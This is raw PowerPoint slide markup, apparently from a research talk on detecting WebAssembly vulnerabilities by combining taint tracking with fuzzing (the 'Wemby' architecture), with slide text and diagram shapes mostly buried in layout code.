              <a:rPr lang="en-US" sz="3300" b="1" kern="1200"/>
              <a:t> and the host</a:t>
            </a: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B7FF2555-D61F-2359-3827-F1F560278D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466164" y="4043819"/>
            <a:ext cx="3259670" cy="2246769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY0" fmla="*/ 224677 h 2246769"/>
              <a:gd name="connsiteX1" fmla="*/ 224677 w 3259670"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2246769"/>
              <a:gd name="connsiteX2" fmla="*/ 3034993 w 3259670"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2246769"/>
              <a:gd name="connsiteX3" fmla="*/ 3259670 w 3259670"/>
              <a:gd name="connsiteY3" fmla="*/ 224677 h 2246769"/>
              <a:gd name="connsiteX4" fmla="*/ 3259670 w 3259670"/>
              <a:gd name="connsiteY4" fmla="*/ 2022092 h 2246769"/>
              <a:gd name="connsiteX5" fmla="*/ 3034993 w 3259670"/>
              <a:gd name="connsiteY5" fmla="*/ 2246769 h 2246769"/>
              <a:gd name="connsiteX6" fmla="*/ 224677 w 3259670"/>
              <a:gd name="connsiteY6" fmla="*/ 2246769 h 2246769"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY7" fmla="*/ 2022092 h 2246769"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY8" fmla="*/ 224677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670" h="2246769">
                <a:moveTo>
                  <a:pt x="0" y="224677"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100591"/>
                  <a:pt x="100591" y="0"/>
                  <a:pt x="224677" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3034993" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3159079" y="0"/>
                  <a:pt x="3259670" y="100591"/>
                  <a:pt x="3259670" y="224677"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3259670" y="2022092"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3259670" y="2146178"/>
                  <a:pt x="3159079" y="2246769"/>
                  <a:pt x="3034993" y="2246769"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="224677" y="2246769"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100591" y="2246769"/>
                  <a:pt x="0" y="2146178"/>
                  <a:pt x="0" y="2022092"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2246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536" tIns="191536" rIns="191536" bIns="191536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err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" kern="1200"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" kern="1200"/>
              <a:t>stateful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858F0E11-C4E0-A476-1CB5-8DB0841DF41B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273459" y="4043819"/>
            <a:ext cx="3259670" cy="2246769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY0" fmla="*/ 224677 h 2246769"/>
              <a:gd name="connsiteX1" fmla="*/ 224677 w 3259670"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2246769"/>
              <a:gd name="connsiteX2" fmla="*/ 3034993 w 3259670"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2246769"/>
              <a:gd name="connsiteX3" fmla="*/ 3259670 w 3259670"/>
              <a:gd name="connsiteY3" fmla="*/ 224677 h 2246769"/>
              <a:gd name="connsiteX4" fmla="*/ 3259670 w 3259670"/>
              <a:gd name="connsiteY4" fmla="*/ 2022092 h 2246769"/>
              <a:gd name="connsiteX5" fmla="*/ 3034993 w 3259670"/>
              <a:gd name="connsiteY5" fmla="*/ 2246769 h 2246769"/>
              <a:gd name="connsiteX6" fmla="*/ 224677 w 3259670"/>
              <a:gd name="connsiteY6" fmla="*/ 2246769 h 2246769"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY7" fmla="*/ 2022092 h 2246769"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY8" fmla="*/ 224677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9670" h="2246769">
                <a:moveTo>
                  <a:pt x="0" y="224677"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100591"/>
                  <a:pt x="100591" y="0"/>
                  <a:pt x="224677" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3034993" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3159079" y="0"/>
                  <a:pt x="3259670" y="100591"/>
                  <a:pt x="3259670" y="224677"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3259670" y="2022092"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3259670" y="2146178"/>
                  <a:pt x="3159079" y="2246769"/>
                  <a:pt x="3034993" y="2246769"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="224677" y="2246769"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100591" y="2246769"/>
                  <a:pt x="0" y="2146178"/>
                  <a:pt x="0" y="2022092"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2246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shade val="6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536" tIns="191536" rIns="191536" bIns="191536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/>
              <a:t>Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" kern="1200"/>
              <a:t>manual analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" kern="1200"/>
              <a:t>to use </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39210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87E1A-871C-A8F6-4571-CB5675A3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95D06-DF81-F33D-645D-18937276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72"/>
            <a:ext cx="10515600" cy="2852737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>automatically</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>scale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>?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55B0F6-B50A-457A-0263-62D4BBCB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64E752-0689-94B7-C04F-F3FCC6D7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9273" y="6492874"/>
            <a:ext cx="5313454" cy="228601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Vulnerabilities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70A0E-DD6B-F063-49D4-0B2443B2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7</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/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025B774-34C8-9E83-4036-596BE4648540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211627" y="3292506"/>
            <a:ext cx="6230566" cy="2376697"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="44546A"/>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5">
              <a:shade val="15000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1001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400"/>
              <a:t>Combining taint tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>with fuzzing!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42332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9874-5E9B-1531-C7B3-17D6A229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Wemby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Architecture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AB4B368D-331D-86C1-23DF-F1933FF1F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37C3B1-33C9-F71D-5186-ED16D85C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273D1-B963-1639-51B9-273B5B68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8</a:t>
            </a:fld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FDDFA5A7-1294-C2AF-78FC-B39E49122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[Draissi et al., ISSTA 2025]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51A00EA-BD90-E91C-48A4-769828E14AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3613080" y="1225827"/>
            <a:ext cx="4626586" cy="50595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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD024FC-3925-3FA9-177B-794462E1C4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3890881" y="1437323"/>
            <a:ext cx="4277087" cy="414000"/>
            <a:chOff x="7034135" y="823072"/>
            <a:chExt cx="3415485" cy="344196"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rechteck: abgerundete Ecken 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72933DA-755F-2D46-FC52-C1A919F083F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7034135" y="823073"/>
              <a:ext cx="2244090" cy="34419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/>
                <a:t>http://CuteCats.com/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Interaktive Schaltfläche: Zur Startseite wechseln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90DAA25-E889-92B1-7361-4996A5FB511A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9342536" y="823073"/>
              <a:ext cx="379329" cy="337053"/>
            </a:xfrm>
            <a:prstGeom prst="actionButtonHome">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E7E6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nteraktive Schaltfläche: Dokument 2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907BEF7-38C8-9D1D-2418-74F592E14858}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9773464" y="823073"/>
              <a:ext cx="315047" cy="337053"/>
            </a:xfrm>
            <a:prstGeom prst="actionButtonDocument">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E7E6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nteraktive Schaltfläche: Zurück oder Vorherige(r) 3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A2D661-6008-155E-BFFB-CAFEF0FCB9E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10140110" y="823072"/>
              <a:ext cx="309510" cy="337053"/>
            </a:xfrm>
            <a:prstGeom prst="actionButtonBackPrevious">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E7E6E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hteck: abgerundete Ecken 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B38DE6-8983-A48D-7890-D456F5775C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829051" y="2187212"/>
            <a:ext cx="4117968" cy="4006759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7E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200" b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6" name="Grafik 14" descr="Ein Bild, das gelb, Schrift, Grafiken, Symbol enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C0B7DF-43BE-B429-1F23-23E9C8006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54403" y="2056914"/>
            <a:ext cx="490102" cy="51555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Rechteck: abgerundete Ecken 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6541E9-FFC9-26DA-744D-C3E3B3652982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4115568" y="3207601"/>
            <a:ext cx="3688598" cy="2883137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200" b="0">
              <a:solidFill>
                <a:schemeClr val="bg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23" name="Grafik 1032" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A839CF3C-BDEE-F7D1-3952-A1FA1A161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20543" y="5394171"/>
            <a:ext cx="582880" cy="581389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6" name="Gerade Verbindung 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC294CB1-078E-BCFC-D296-4C1F46D26AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="4"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362656" y="4171234"/>
            <a:ext cx="912" cy="298411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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Gerade Verbindung 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60367D96-3B6B-0E8E-47BB-5C60CB1B7875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="3"/>
            <a:endCxn id="32" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5633682" y="4859890"/>
            <a:ext cx="568241" cy="245311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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Gerade Verbindung 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43C9852-70E0-8305-9FCA-0E6B5E407B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="5"/>
            <a:endCxn id="31" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525213" y="4859890"/>
            <a:ext cx="510453" cy="136918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sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Ellipse 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968675B7-9484-6E6C-1CDB-7DA7C57F2387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134056" y="3714034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A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Ellipse 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84648369-18FB-DDD9-5DC3-F88062CFB3F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134968" y="4469645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B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Ellipse 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFBA4496-19FB-6D46-FC93-0AE7FAF3AB03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7035666" y="4768208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32" name="Ellipse 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37037A7F-4A1E-FEE2-D1CE-2D7865898947}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176482" y="4876601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D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Ellipse 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{934F0849-D7C7-F304-E365-311AD9B0931D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280017" y="4177399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</a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Gekrümmte Verbindung 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC648A40-96AE-6EC6-D3DD-A5862F8724C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="33" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4737218" y="4405999"/>
            <a:ext cx="1397751" cy="292246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sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Ellipse 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D764F4-E3F3-B076-21A7-69916B323CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166340" y="5305281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tIns="91440" bIns="91440" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" kern="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Gerade Verbindung 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671607FF-41A6-84F6-4541-E594F95AB5C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="4"/>
            <a:endCxn id="35" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6623540" y="5225408"/>
            <a:ext cx="640726" cy="308473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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="Gruppieren 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A3E59F-88E0-6C03-8777-57AECCA5D442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="221309" y="136525"/>
            <a:ext cx="2712391" cy="1391128"/>
            <a:chOff x="961413" y="5109793"/>
            <a:chExt cx="2293515" cy="1193410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Rechteck 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD57E34-93DE-C3EC-BC96-1DB9F5106A26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="961413" y="5109793"/>
              <a:ext cx="2293515" cy="1193410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feld 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C89CC0F-FB03-5AF3-4443-80ECC2C9A48E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1054764" y="5135367"/>
              <a:ext cx="2067316" cy="31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External input data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="Grafik 7" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE0B689-3C3C-4E00-510D-36DDE1B8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1069746" y="5522805"/>
              <a:ext cx="972000" cy="6434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9" name="Grafik 8" descr="Ein Bild, das Säugetier, Katze, Kleine bis mittelgroße Katzen, Hauskatze enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951C2897-B338-81B2-A37B-A3559FD1A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2150079" y="5505408"/>
              <a:ext cx="972000" cy="647999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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C2F1DBD6-21B2-1190-2F72-F1D40C934045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="86" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2556669" y="548489"/>
            <a:ext cx="744184" cy="2702512"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2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Ellipse 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B74D2-F190-D482-D5F6-4108391A4419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4404336" y="5332640"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="654FF0"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg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de-DE" sz="2800" b="1" kern="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="99" name="Gerade Verbindung 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD8A0C92-8013-AE7F-F766-445DDBAC859C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="3"/>
            <a:endCxn id="98" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
